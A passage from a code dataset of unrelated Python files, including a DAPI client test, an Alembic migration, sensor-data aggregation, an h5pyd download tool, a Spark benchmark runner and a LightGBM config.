hmac_obj.digest()\n log.debug(\"Hmac:{} size:{}\".format(hmc_res.hex(), len(hmc_res)))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"py_hmac/py_hmac.py","file_name":"py_hmac.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"223326409","text":"from client import DAPIClient\nimport cbor2\n\nclient = DAPIClient()\n\n\ndef jsonrpc_tests():\n current_block_hash = client.getBestBlockHash()\n print('Test - getBestBlockHash: {}\\n'.format(current_block_hash))\n\n height = 0\n genesis_block_hash = client.getBlockHash(height)\n print('Test - getBlockHash (height: {}): {}\\n'.format(height, genesis_block_hash))\n\n mnlist_diff = client.getMnListDiff(genesis_block_hash, current_block_hash)\n print('Test - getMnListDiff:\\n{}\\n'.format(mnlist_diff))\n\n utxo = client.getUTXO('yPprxZrUL8UN73qLDS2xCg6yBFGieUWz7Q')#, 2)\n print('Test - getUTXO:\\n{}\\n'.format(utxo))\n\n address = 'yVs4HGmHgzP4t3gZ7KrpxRzCmkQcvZmczd'\n getAddressSummary = client.getAddressSummary(address)\n print('Test - getAddressSummary (address: {}): {}\\n' .format(address, getAddressSummary))\n return mnlist_diff\n\ndef jsonrpc_comm_test(mnlist_diff):\n print('Test - Check for JSON-RPC response from all masternodes')\n for mn in mnlist_diff['mnList']:\n ip = mn['service'].split(':')[0]\n try:\n response = client.make_request_to_node('getBestBlockHash', {}, ip)\n print('Successful response from {}: {}'.format(ip, response))\n except Exception as ex:\n print('*** Failure from {} ***'.format(ip))\n\n\ndef main():\n mnlist_diff = jsonrpc_tests()\n\n jsonrpc_comm_test(mnlist_diff)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"dapiclient/test-dapiclient.py","file_name":"test-dapiclient.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"130348154","text":"import numpy as np\nfrom tqdm import tqdm\n\ndef read_preds(train_date, start_epoch=0, finish_epoch=5, is_train=True):\n stage = ''\n if not is_train: stage = 'val_'\n train_preds_lst = []\n for i in tqdm_notebook(range(start_epoch, finish_epoch+1)):\n i_preds = np.genfromtxt(f'../data/result/{train_date}/preds/{stage}preds_{i}.csv', delimiter=',')\n train_preds_lst.append(i_preds)\n return train_preds_lst\n\n\ndef _get_target_cols():\n submission = pd.read_csv(os.path.join(DATA_DIR, 'sample_submission.csv'))\n target_columns = submission.columns.values[1:].tolist()\n return target_columns","sub_path":"lib/read_pandas.py","file_name":"read_pandas.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"618127627","text":"\"\"\"empty message\n\nRevision ID: 9f2abdd7a490\nRevises: bf6d916ec705\nCreate Date: 2018-06-25 12:33:02.465152\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '9f2abdd7a490'\ndown_revision = 'bf6d916ec705'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('leader_permission',\n sa.Column('id', mysql.BIGINT(unsigned=True), nullable=False),\n sa.Column('department_id', mysql.BIGINT(unsigned=True), nullable=False),\n sa.Column('permission_id', mysql.BIGINT(unsigned=True), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n mysql_charset='utf8mb4',\n mysql_engine='InnoDB'\n )\n op.create_index('idx_leader_permission_d', 'leader_permission', ['department_id'], unique=False)\n op.drop_table('employee_department')\n op.create_index('idx_department_permission_d', 'department_permission', ['department_id'], unique=False)\n op.drop_column('department_permission', 'leader_only')\n op.add_column('department_tree', sa.Column('department_id', mysql.BIGINT(unsigned=True), nullable=False))\n op.add_column('department_tree', sa.Column('depth', mysql.BIGINT(unsigned=True), nullable=False))\n op.add_column('department_tree', sa.Column('parent_id', mysql.BIGINT(unsigned=True), nullable=False))\n op.create_index('idx_department_tree_d', 'department_tree', ['department_id'], unique=False)\n op.create_index('idx_department_tree_p', 'department_tree', ['parent_id'], unique=False)\n op.drop_column('department_tree', 'parent_path')\n op.add_column('employee', sa.Column('department_id', mysql.BIGINT(unsigned=True), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('employee', 'department_id')\n op.add_column('department_tree', sa.Column('parent_path', mysql.VARCHAR(length=128), nullable=False))\n op.drop_index('idx_department_tree_p', table_name='department_tree')\n op.drop_index('idx_department_tree_d', table_name='department_tree')\n op.drop_column('department_tree', 'parent_id')\n op.drop_column('department_tree', 'depth')\n op.drop_column('department_tree', 'department_id')\n op.add_column('department_permission', sa.Column('leader_only', mysql.TINYINT(display_width=1), autoincrement=False, nullable=False))\n op.drop_index('idx_department_permission_d', table_name='department_permission')\n op.create_table('employee_department',\n sa.Column('employee_id', mysql.BIGINT(display_width=20, unsigned=True), nullable=False),\n sa.Column('department_id', mysql.BIGINT(display_width=20, unsigned=True), autoincrement=False, nullable=False),\n sa.PrimaryKeyConstraint('employee_id'),\n mysql_default_charset='utf8mb4',\n mysql_engine='InnoDB'\n )\n op.drop_index('idx_leader_permission_d', table_name='leader_permission')\n op.drop_table('leader_permission')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/9f2abdd7a490_.py","file_name":"9f2abdd7a490_.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"298076139","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom pathlib import Path\nimport os\nimport sys\nimport glob\nimport json\nimport time\n\ndef set_working_dirs(json_dir_file, patient_num, patient_set):\n \"\"\"Loads in the dirs needed from json_dir_file. Retruns the paths objects.\"\"\"\n with open(json_dir_file) as f:\n paths_dict= json.loads(f.read())\n base_dir= Path(paths_dict['base_dir'])\n data_dir= Path(paths_dict['data_dir'])\n if patient_set == 'healthy':\n dir= Path(paths_dict['healthy_data_dir'])\n patient_data_dir= dir / patient_num\n elif patient_set == 'diabetes':\n dir= Path(paths_dict['diabetes_data_dir'])\n patient_data_dir= dir/ patient_num\n else:\n raise Exception('Patient_set must be either healthy or diabetes!')\n interim_data_dir= Path(paths_dict['interim_data_dir'])\n return(base_dir, data_dir, interim_data_dir, patient_data_dir)\n\ndef load_pat_data_into_df(patient_data_dir):\n \"\"\"Loads in the summary data from the sensors and returns dfs in a dict.\"\"\"\n data_glob= patient_data_dir.glob('**/*')\n files= [str(x).split('/')[-1] for x in data_glob if x.is_file()]\n raw_data_dict= {}\n for i, name in enumerate(files):\n raw_data_dict[i]= pd.read_csv(patient_data_dir/name)\n return raw_data_dict\n\ndef remove_unwanted_cols(df):\n \"\"\"Removes unwanted columns from the data and returns the cleaned df.\"\"\"\n df= df.drop(['BatteryVolts', 'BatteryLevel', 'SystemConfidence', 'ROGState', 'ROGTime',\n 'VerticalMin', 'VerticalPeak', 'LateralMin', 'LateralPeak', 'SagittalMin',\n 'SagittalPeak', 'DeviceTemp', 'StatusInfo', 'LinkQuality', 'RSSI', 'CoreTemp'\n , 'AuxADC1', 'AuxADC2', 'AuxADC3', 'SkinTemp', 'BRNoise', 'BRConfidence',\n 'ECGNoise', 'GSR', 'TxPower', 'HRV', 'HRConfidence'], axis=1)\n return df\n\ndef remove_null_HR_BR_entries(df, HR_col= 'HR', BR_col= 'BR'):\n \"\"\"Removes any measurements where HR or BR measured is zero,\n returns dataframe without these rows\"\"\"\n index_drop= df[df[HR_col] == 0].index\n df = df.drop(index_drop)\n index_drop_2= df[df[BR_col] == 0].index\n df = df.drop(index_drop_2)\n return df\n\ndef index_df_by_date(df, index_col= 'Time'):\n \"\"\"Converts the index to a datetime object and returns the\n reindexed dataset\"\"\"\n df[index_col] = pd.to_datetime(df[index_col])\n df= df.set_index(df[index_col]).drop([index_col], axis=1)\n return df\n\ndef drop_unwanted_cols_and_nulls(raw_data_dict):\n \"\"\"Drops columns not needed and and HR/BR zero values that are measurement\n issues. Returns the cleaned data as a dict of dfs.\"\"\"\n clean_data_dict= {}\n for i, data in raw_data_dict.items():\n clean_data= remove_unwanted_cols(data)\n clean_no_null= remove_null_HR_BR_entries(clean_data)\n clean_data_dict[i]= clean_no_null\n return clean_data_dict\n\ndef min_res_data_dropnas(clean_data_dict):\n \"\"\"Aggregates the data by minute resolution with mean and std then drops\n NaNs. Also deletes first and last 5mins recordings as data is messy\n (especially for ECG and BR aplitude). Returns the data as a dict of dfs.\"\"\"\n clean_min_data_dict= {}\n for i, data in clean_data_dict.items():\n data= index_df_by_date(data)\n sum_mean= data.resample('T').mean()\n sum_std= data.resample('T').std()\n sum_std.columns = [str(col) + '_std' for col in sum_std.columns]\n sum_data= pd.concat([sum_mean, sum_std], axis=1)\n sum_data= sum_data.dropna(axis=0)\n sum_data= sum_data.iloc[4:-5, :] #Removes first and last 5 mins recordings\n clean_min_data_dict[i]= sum_data\n return clean_min_data_dict\n\ndef pool_patient_data_into_df(clean_min_data_dict, patient_num, patient_set, interim_data_dir):\n \"\"\"Pool patient data from different recodings and make as a single df. Saves\n as csv in imterim data folder\"\"\"\n df= pd.DataFrame()\n for i, data in clean_min_data_dict.items():\n df= df.append(data)\n print('Data shape is {}'.format(df.shape))\n df.to_csv(interim_data_dir/'agg_data_{}_{}.csv'.format(patient_set, patient_num))\n return\n\nsubset= input('Which patient subset would you like to process (healthy or diabetes)? ')\npatients=[]\npatients= input('Enter the file names for the patients to be processed as a list of strings seperated by a space ')\npat_list= list(patients.split(' '))\n\nfor i, val in enumerate(pat_list):\n start= time.time()\n base_dir, data_dir, interim_data_dir, patient_data_dir= set_working_dirs(\n '/home/darren/Documents/DS/projects/health_data/src/dir_file.json', patient_num= val, patient_set= subset)\n raw_data_dict= load_pat_data_into_df(patient_data_dir)\n clean_data_dict= drop_unwanted_cols_and_nulls(raw_data_dict)\n clean_min_data_dict= min_res_data_dropnas(clean_data_dict)\n pool_patient_data_into_df(clean_min_data_dict, patient_num= val, patient_set= subset, interim_data_dir= interim_data_dir)\n t_sec= round(time.time() - start)\n (t_min, t_sec)= divmod(t_sec, 60)\n print('File processing took: {}min:{}sec'.format(t_min, t_sec))\n\nprint('Processing finished!!')\n","sub_path":"src/agg_data_driver.py","file_name":"agg_data_driver.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"55968081","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/h5pyd/_apps/hsget.py\n# Compiled at: 2019-10-28 20:47:17\n# Size of source mod 2**32: 7446 bytes\nimport sys, logging\ntry:\n import h5py, h5pyd\nexcept ImportError as e:\n try:\n sys.stderr.write('ERROR : %s : install it to use this utility...\\n' % str(e))\n sys.exit(1)\n finally:\n e = None\n del e\n\nif __name__ == '__main__':\n from config import Config\n from utillib import load_file\nelse:\n from .config import Config\n from .utillib import load_file\ncfg = Config()\n\ndef usage():\n print('Usage:\\n')\n print(' {} [ OPTIONS ] domain filepath'.format(cfg['cmd']))\n print('')\n print('Description:')\n print(' Copy server domain to local HDF5 file')\n print(' domain: HDF Server domain (Unix or DNS style)')\n print(' filepath: HDF5 file to be created ')\n print('')\n print('Options:')\n print(' -v | --verbose :: verbose output')\n print(' -e | --endpoint :: The HDF Server endpoint, e.g. http://hsdshdflab.hdfgroup.org')\n print(' -u | --user :: User name credential')\n print(' -p | --password :: Password credential')\n print(' -c | --conf :: A credential and config file')\n print(' --cnf-eg :: Print a config file and then exit')\n print(' --logfile :: logfile path')\n print(' --loglevel debug|info|warning|error :: Change log level')\n print(' --bucket :: Storage bucket')\n print(' --nodata :: Do not download dataset data')\n print(\" -4 :: Force ipv4 for any file staging (doesn't set hsds loading net)\")\n print(' -6 :: Force ipv6 (see -4)')\n print(' -h | --help :: This message.')\n print('')\n\n\ndef print_config_example():\n print('# default')\n print('hs_username = ')\n print('hs_password = ')\n print('hs_endpoint = http://hsdshdflab.hdfgroup.org')\n\n\ndef main():\n loglevel = logging.ERROR\n verbose = False\n nodata = False\n cfg['cmd'] = sys.argv[0].split('/')[(-1)]\n if cfg['cmd'].endswith('.py'):\n cfg['cmd'] = 'python ' + cfg['cmd']\n cfg['verbose'] = False\n endpoint = cfg['hs_endpoint']\n username = cfg['hs_username']\n password = cfg['hs_password']\n bucket = cfg['hs_bucket']\n logfname = None\n ipvfam = None\n des_file = None\n src_domain = None\n argn = 1\n while argn < len(sys.argv):\n arg = sys.argv[argn]\n val = None\n if arg[0] == '-':\n if src_domain is not None:\n print('options must precead source files')\n usage()\n sys.exit(-1)\n if len(sys.argv) > argn + 1:\n val = sys.argv[(argn + 1)]\n if arg in ('-v', '--verbose'):\n verbose = True\n argn += 1\n elif arg == '--nodata':\n nodata = True\n argn += 1\n elif arg == '--loglevel':\n if val == 'debug':\n loglevel = logging.DEBUG\n else:\n if val == 'info':\n loglevel = logging.INFO\n else:\n if val == 'warning':\n loglevel = logging.WARNING\n else:\n if val == 'error':\n loglevel = logging.ERROR\n else:\n print('unknown loglevel')\n usage()\n sys.exit(-1)\n argn += 2\n elif arg == '--logfile':\n logfname = val\n argn += 2\n elif arg in ('-b', '--bucket'):\n bucket = val\n argn += 2\n elif arg == '-4':\n ipvfam = 4\n elif arg == '-6':\n ipvfam = 6\n elif arg in ('-h', '--help'):\n usage()\n sys.exit(0)\n elif arg in ('-e', '--endpoint'):\n endpoint = val\n argn += 2\n elif arg in ('-u', '--username'):\n username = val\n argn += 2\n elif arg in ('-p', '--password'):\n password = val\n argn += 2\n elif arg == '--cnf-eg':\n print_config_example()\n sys.exit(0)\n elif arg[0] == '-':\n usage()\n sys.exit(-1)\n elif src_domain is None:\n src_domain = arg\n argn += 1\n elif des_file is None:\n des_file = arg\n argn += 1\n else:\n usage()\n sys.exit(-1)\n\n logging.basicConfig(filename=logfname, format='%(asctime)s %(message)s', level=loglevel)\n logging.debug('set log_level to {}'.format(loglevel))\n logging.info('username: {}'.format(username))\n logging.info('password: {}'.format(password))\n logging.info('endpoint: {}'.format(endpoint))\n logging.info('verbose: {}'.format(verbose))\n if src_domain is None or des_file is None:\n usage()\n sys.exit(-1)\n logging.info('source domain: {}'.format(src_domain))\n logging.info('target file: {}'.format(des_file))\n if endpoint is None:\n logging.error('No endpoint given, try -h for help\\n')\n sys.exit(1)\n logging.info('endpoint: {}'.format(endpoint))\n try:\n fin = h5pyd.File(src_domain, mode='r', endpoint=endpoint, username=username, password=password, bucket=bucket, use_cache=True)\n except IOError as ioe:\n try:\n if ioe.errno == 403:\n logging.error('No read access to domain: {}'.format(src_domain))\n else:\n if ioe.errno == 404:\n logging.error('Domain: {} not found'.format(src_domain))\n else:\n if ioe.errno == 410:\n logging.error('Domain: {} has been recently deleted'.format(src_domain))\n else:\n logging.error('Error opening domain {}: {}'.format(src_domain, ioe))\n sys.exit(1)\n finally:\n ioe = None\n del ioe\n\n try:\n fout = h5py.File(des_file, 'w')\n except IOError as ioe:\n try:\n logging.error('Error creating file {}: {}'.format(des_file, ioe))\n sys.exit(1)\n finally:\n ioe = None\n del ioe\n\n try:\n load_file(fin, fout, verbose=verbose, nodata=nodata)\n msg = 'Domain {} downloaded to file: {}'.format(src_domain, des_file)\n logging.info(msg)\n if verbose:\n print(msg)\n except KeyboardInterrupt:\n logging.error('Aborted by user via keyboard interrupt.')\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/h5pyd-0.7.1-py3.7/hsget.cpython-37.py","file_name":"hsget.cpython-37.py","file_ext":"py","file_size_in_byte":6827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"139790452","text":"# Python 3.3.3 and 2.7.6\n# python helloworld_python.py\n\nfrom threading import Thread\nimport threading\n\nj = 0\nlock = threading.Lock()\n\ndef thread_1_function():\n global j\n for i in range(0,100001):\n lock.acquire()\n j+=1\n lock.release()\n\ndef thread_2_function():\n global j\n for i in range(-100000,0):\n lock.acquire()\n j-=1\n lock.release()\n\ndef main():\n thread_1 = Thread(target = thread_1_function, args = (),)\n thread_1.start()\n thread_2 = Thread(target = thread_2_function, args = (),)\n thread_2.start()\n\n thread_1.join()\n thread_2.join()\n print(j)\n\nmain()\n","sub_path":"exercises/ex02/ex02.py","file_name":"ex02.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"317872517","text":"import sys\nimport time\nimport os\nimport threading\nimport time\nimport logging\nimport argparse\nimport subprocess\nsys.path.append('lib')\nfrom decoder import *\nfrom env_conf import *\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\nprefix = app_path\nbenchmark_prefix = work_load\nmaster_ip = get_master_ip()\nslaves_name = get_slaves_name()\n\ndef start_samp_slave(slave):\n os.system('ssh '+slave+' python3 '+prefix+'lib/samp_run.py')\n# 去掉异常生成器的调用\n# def start_anomaly_slave(slave,last,t,ip):\n# os.system('ssh '+slave+' python3 '+prefix+'anomaly_generator.py -t '+t+' -last '+str(last)+' -tnum '+str(res.tnum)+' ')\n\ndef start_iostat_local():\n os.system(\"python \"+prefix+\"/samp_run.py\")\n time.sleep(100)\n\n# def start_anomaly_local():\n# os.system(\"python \"+prefix+\"anomaly_generator.py -disable -ip \"+master_ip)\n# time.sleep(100)\n\ndef start_benchmark(cmd):\n ### luice modified\n '''\n 检查是否存在 spark 程序,如果存在,运行 spark 程序,否则运行 hadoop 程序\n '''\n # workload_path = benchmark_prefix+name\n # if os.path.exists(workload_path + '/spark'):\n # os.system(workload_path + '/spark/run.sh')\n # elif os.path.exists(workload_path + '/hadoop'):\n # os.system(workload_path + '/hadoop/run.sh')\n while True:\n try:\n print(cmd)\n subprocess.check_call(cmd, shell=True)\n break\n except subprocess.CalledProcessError:\n logging.info(\"命令执行失败,请重新输入\")\n cmd = input()\n continue\n\n\n# os.system('ssh slave5 \\'' + workload_path + '/hadoop/run.sh\\'')\n\ndef start(res):\n print('请输入执行任务的命令')\n cmd = input()\n while True:\n # benchmark=res.name\n pin_ano_start_time=time.time()\n ### luice comment\n\n for slave in slaves_name:\n t = threading.Thread(target = start_samp_slave,args=(slave,))\n t.start()\n\n slaves=res.slaves\n ano_slaves=[]\n if slaves=='all':\n ano_slaves=slaves_name\n elif slaves=='':\n pass\n else:\n ano_slaves.extend(slaves.split())\n # 去掉异常生成器的调用\n # for i in ano_slaves:\n # t = threading.Thread(target = start_anomaly_slave,args=(i,res.last,res.ano,res.ip))\n # t.start()\n logging.info('ready to start workload,timestamp=',time.time())\n pin_benchmark_start_time=time.time()\n try:\n subprocess.check_call(cmd, shell=True)\n break\n except subprocess.CalledProcessError:\n logging.info(\"命令执行失败,请重新输入\")\n cmd = input()\n continue\n # start_benchmark(cmd)\n logging.info('benchmark done! timestamp=',time.time())\n logging.info('ready to collect logs')\n pin_benmark_end_time=time.time()\n collect_logs()\n pin_collect_log_time=time.time()\n kill()\n decode()\n\n pin_end_time=time.time()\n with open('experiment/overhead','a') as d:\n d.write('%.3f %.3f %.3f %.3f %.3f %.3f'%(pin_global_init_time-pin_global_start_time,pin_ano_start_time-pin_global_init_time,\n pin_benchmark_start_time-pin_ano_start_time,pin_benmark_end_time-pin_benchmark_start_time,pin_collect_log_time-pin_benmark_end_time,\n pin_end_time-pin_collect_log_time)+'\\n')\n # get application duration\n for file in os.listdir('out'):\n if file.startswith('app'):\n app='out/'+file\n # luice comment\n '''\n import job_time\n print('spark log file:',app)\n start_time,end_time=job_time.job_time(app)\n print('\\n+---------------------------------------------------------------+')\n print('\\tjob time:',end_time-start_time,'delay:',start_time-pin_ano_start_time)\n print('+---------------------------------------------------------------+\\n')\n with open(res.job_time_file,'a') as f:\n f.write(str(end_time-start_time)+'\\n')\n with open('out/delay','w') as f:\n f.write(str(start_time-pin_ano_start_time))\n time.sleep(5)\n os.system(\"ps aux|grep \\\"anomaly_generator.py\\\"|awk \\'{print $2}\\'|xargs kill $1\")\n print('\\033[32m[INFO] Application analysis...\\033[0m')\n os.system('python3 root_cause.py')\n '''\n\ndef collect_logs():\n os.system(\"cp $SPARK_HOME/tsee_log/* ./logs\")\n os.system(\"cp ./logs/app* ./out\")\n for slave in slaves_name:\n os.system(\"scp \"+slave+\":\"+prefix+\"/logs/iostat_log_master ./logs/iostat_log_\"+slave)\n\n for slave in slaves_name:\n os.system(\"scp \"+slave+\":\"+prefix+\"/logs/vmstat_log_master ./logs/vmstat_log_\"+slave)\n\n for slave in slaves_name:\n os.system(\"scp \"+slave+\":\"+prefix+\"/logs/mpstat_log_master ./logs/mpstat_log_\"+slave)\n\n for slave in slaves_name:\n os.system(\"scp \"+slave+\":\"+prefix+\"/logs/sar_log_master ./logs/sar_log_\"+slave)\n\n for slave in slaves_name:\n os.system(\"scp \"+slave+\":\"+prefix+\"/logs/anomaly_log.txt ./logs/anomaly_\"+slave)\n# def collect_logs():\n# os.system(\"cp $SPARK_HOME/tsee_log/* temp/bigroot/logs\")\n# os.system(\"cp temp/bigroot/logs/app* temp/bigroot/out\")\n# for slave in slaves_name:\n# os.system(\"scp \"+slave+\":\"+prefix+\"/temp/bigroot/logs/iostat_log_master temp/bigroot/logs/iostat_log_\"+slave)\n#\n# for slave in slaves_name:\n# os.system(\"scp \"+slave+\":\"+prefix+\"/temp/bigroot/logs/vmstat_log_master temp/bigroot/logs/vmstat_log_\"+slave)\n#\n# for slave in slaves_name:\n# os.system(\"scp \"+slave+\":\"+prefix+\"/temp/bigroot/logs/mpstat_log_master temp/bigroot/logs/mpstat_log_\"+slave)\n#\n# for slave in slaves_name:\n# os.system(\"scp \"+slave+\":\"+prefix+\"/temp/bigroot/logs/sar_log_master temp/bigroot/logs/sar_log_\"+slave)\n#\n# for slave in slaves_name:\n# os.system(\"scp \"+slave+\":\"+prefix+\"/temp/bigroot/logs/anomaly_log.txt temp/bigroot/logs/anomaly_\"+slave)\n\ndef init():\n os.system(\"rm ./logs/* ./out/* experiment/*\")\n for slave in slaves_name:\n os.system(\"ssh \"+slave+\" python \"+prefix+\"lib/kill_samp.py\")\n\n os.system(\"rm /home/zhg/spark/tsee_log/*\")\n logging.info('clear old logs in salves')\n for slave in slaves_name:\n os.system('ssh '+slave+' \"rm %slogs/*\"'%(prefix))\n\ndef decode():\n os.system(\"cp logs/anomaly* out\")\n for slave in slaves_name:\n decode_sar(slave)\n for slave in slaves_name:\n decode_mpstat(slave)\n for slave in slaves_name:\n decode_iostat(slave)\n\ndef kill():\n for slave in slaves_name:\n os.system(\"ssh \"+slave+\" python \"+prefix+\"lib/kill_samp.py\")\n\n\nparser=argparse.ArgumentParser()\nparser.add_argument('-run',action='store_true',help='run the whole system')\n# parser.add_argument('-name',type=str,default='micro/wordcount',help='specify benchmark name')\nparser.add_argument('-collect',action='store_true',help='collect logs from slaves')\nparser.add_argument('-decode',action='store_true',help='decode logs')\nparser.add_argument('-last',type=int,default=30,help='specify anomaly last time')\nparser.add_argument('-ano',type=str,default='cpu',help='choices are cpu, io, net, all')\nparser.add_argument('-slaves',type=str,default='5',help='slaves to generate anomaly')\nparser.add_argument('-ip',type=str,default='10.254.13.16',help='connect particular ip address')\nparser.add_argument('-job_time_file',type=str,default='info',help='dump job duration info to this file')\nparser.add_argument('-tnum',type=int,default='32',help='thread num to start')\nres=parser.parse_args()\nif res.run:\n ### luice comment\n pin_global_start_time=time.time()\n logging.info('init system status')\n init()\n pin_global_init_time=time.time()\n start(res)\n\n# luice comment\n'''\nif res.collect:\n collect_logs()\n decode()\n kill()\nif res.decode:\n decode()\n'''\n","sub_path":"cmd/bigroot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"538052689","text":"from .yolo.yolo import YoloDetector\nfrom .nanodet.nanodet import NanoDetector\nfrom .nanodet.util import Logger, cfg, load_config\n\nimport torch\n\n\nclass PersonDetector:\n def __init__(self, cfg_file, weight):\n if cfg_file.endswith(\".yml\"):\n logger = Logger(0, use_tensorboard=False)\n self.algo = \"nanodet\"\n load_config(cfg, cfg_file)\n self.detector = NanoDetector(cfg, weight, logger)\n elif cfg_file.endswith(\".cfg\"):\n self.algo = \"yolov3\"\n self.detector = YoloDetector(cfg_file, weight)\n else:\n raise ValueError(\"{} is not a cfg file!\".format(cfg_file))\n\n def detect(self, frame):\n if self.algo == \"nanodet\":\n meta, res = self.detector.inference(frame)\n boxes = [box for box in res[0][0] if box[-1] > 0.35]\n return torch.tensor([box + [1, 0] for box in boxes])\n elif self.algo == \"yolov3\":\n boxes = self.detector.inference(frame)\n return boxes\n\n\nif __name__ == '__main__':\n import cv2\n cfg = \"/home/hkuit164/Downloads/yolo_selected/coco_basic/pytorch/yolov3-original-1cls-leaky.cfg\"\n weight = \"/home/hkuit164/Downloads/yolo_selected/coco_basic/pytorch/last.weights\"\n\n detector = PersonDetector(cfg, weight)\n\n img_path = \"/media/hkuit164/Elements/data/posetrack18/images/test/000693_mpii_test/000013.jpg\"\n img = cv2.imread(img_path)\n dets = detector.detect(img)\n for bbox in dets:\n bbox = bbox[:4].tolist()\n img = cv2.rectangle(img, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), (255, 0, 0), 4)\n cv2.imshow(\"result\", img)\n cv2.waitKey(0)\n","sub_path":"src/detector/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"554476972","text":"from mechanics.fractions import Fractions\nfrom mechanics.AI import RandomAI\n\nclass BruteAI:\n def __init__(self, battlefield, fractions):\n self.battlefield = battlefield\n self.fractions = fractions\n self.random_ai = RandomAI(battlefield)\n\n def decide_step(self, active_unit, target_fraction=Fractions.PLAYER):\n assert active_unit in self.battlefield.unit_locations\n\n start_location = self.battlefield.unit_locations[active_unit]\n\n target_units = [unit for unit, fraction in self.fractions.items() if fraction is target_fraction]\n\n if target_units:\n distances = self.battlefield.get_units_dists_to(start_location, units_subset=target_units)\n target, _ = distances[0]\n target_location = self.battlefield.unit_locations[target]\n possible_steps = self.battlefield.get_neighbouring_cells(start_location)\n cell, _ = self.battlefield.get_nearest_cell(candidates=possible_steps, target=target_location)\n return cell\n\n else:\n return self.random_ai.decide_step(active_unit)\n\n","sub_path":"mechanics/AI/BruteAI.py","file_name":"BruteAI.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"384930449","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 18-7-21\n\n@author: Suspext\n\"\"\"\nfrom hyperopt import hp\nimport warnings\n\nwarnings.filterwarnings('ignore')\n\n\nclass Config(object):\n path = '/home/suspext/Data/kaggle/Home Credit/'\n origin = path + 'origin/'\n feature = path + 'feature/'\n\n train_path = origin + 'application_train.csv'\n test_path = origin + 'application_test.csv'\n\n lgb_params = { # default\n 'application': 'binary', # regression\n 'boosting_type': 'gbdt', # gbdt\n 'n_estimators': 1000, # 100\n\n 'learning_rate': 0.05, # 0.1\n 'num_leaves': 32,\n 'colsample_bytree': 0.95,\n 'bagging_fraction': 0.87, # 1\n 'feature_fraction': 1, # 1\n 'max_depth': 8, # -1, < 0 意味着没有限制.\n 'reg_alpha': 0.04,\n 'reg_lambda': 0.073,\n\n 'is_unbalance': False, # False\n 'metric': 'auc', # l2\n # 工具箱的最大数特征值决定了容量 工具箱的最小数特征值可能会降低训练的准确性, 但是可能会增加一些一般的影响(处理过度学习)\n 'max_bin': 255, # 255\n 'n_jobs': -1,\n 'verbose': 200,\n 'min_split_gain': 0.022, # 0\n 'min_child_weight': 40,\n # 'early_stopping_round': 100, # 0\n }\n\n lgb_params_fune = {\n 'application': 'binary', # regression\n 'boosting_type': 'gbdt', # gbdt\n 'n_estimators': 1000, # 100\n\n 'learning_rate': hp.choice('learning_rate', range(2, 20)), # 0.1\n 'bagging_fraction': 1, # 1\n 'feature_fraction': 1, # 1\n 'max_depth': -1, # -1, < 0 意味着没有限制.\n 'reg_alpha': 0.1,\n 'reg_lambda': 0.1,\n\n 'is_unbalance': hp.choice('is_unbalance', [True, False]), # False\n 'metric': 'auc', # l2\n\n 'max_bin': 255, # 255\n 'n_jobs': -1,\n 'verbose': 200,\n 'min_split_gain': 0, # 0\n }\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"application/kaggle/Home_Credit/Home_Credit_Config.py","file_name":"Home_Credit_Config.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"467050610","text":"#_*_coding:UTF-8_*_\r\n\r\n\"\"\"\r\n包含assembly_summary.txt的url地址列表\r\n总的refseq信息,bacteria,archaea,fungi,viral,protozoa\r\n\"\"\"\r\n\r\nimport subprocess\r\nimport argparse\r\n\r\n\r\ndef taxonomy():\r\n taxonomy_url = [\"ftp://ftp.ncbi.nih.gov/pub/taxonomy/taxdump.tar.gz\"]\r\n taxonomy_urls = 